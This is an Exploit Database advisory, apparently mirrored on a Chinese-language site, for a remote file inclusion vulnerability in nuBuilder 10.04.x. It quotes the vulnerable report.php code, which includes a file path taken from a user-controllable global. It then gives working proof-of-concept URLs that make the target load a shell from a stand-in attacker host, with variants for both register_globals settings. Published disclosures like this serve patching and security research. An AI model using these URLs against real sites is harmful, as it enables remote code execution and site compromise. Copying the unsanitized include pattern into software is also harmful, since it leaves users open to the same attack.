nuBuilder – Remote File Inclusion

• Exploit Database
• 8 阅读

• 作者： Ahlspiess
  日期： 2010-07-28
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/14490/

• Software: nuBuilder 10.04.x and lower(maybe)?
  Type: Remote File Inclusion
  Download: http://sourceforge.net/projects/nubuilder/files/
  Author: Ahlspiess
  Email: ahlspiess@tbdsecurity.com
  
  Vulnerable file: report.php
  
  report.php file content
  1 	<?php
  2 	/*
  3 	** File: report.php
  4 	** Author: nuSoftware
  5 	** Created: 2007/04/26
  6 	** Last modified: 2009/07/15
  7 	**
  8 	** Copyright 2004, 2005, 2006, 2007, 2008, 2009 nuSoftware
  9 	**
  10 	** This file is part of the nuBuilder source package and is licensed under the
  11 	** GPLv3. For support on developing in nuBuilder, please visit the nuBuilder
  12 	** wiki and forums. For details on contributing a patch for nuBuilder, please
  13 	** visit the `Project Contributions' forum.
  14 	**
  15 	** Website: http://www.nubuilder.com
  16 	** Wiki: http://wiki.nubuilder.com
  17 	** Forums: http://forums.nubuilder.com
  18 	*/
  19 	
  20 	include($GLOBALS['StartingDirectory']."/database.php");<== interesting huh?
  
  POC
  Succesfully tested against php config register_global = On and Off, allow_url_include = On
  
  register_global = Off
  http://site.tld/report.php?StartingDirectory=http://attacker.tld/shell.txt?
  
  register_global = On
  http://site.tld/report.php?GLOBALS[StartingDirectory]=http://attacker.tld/shell.txt?
  
  
  #EOF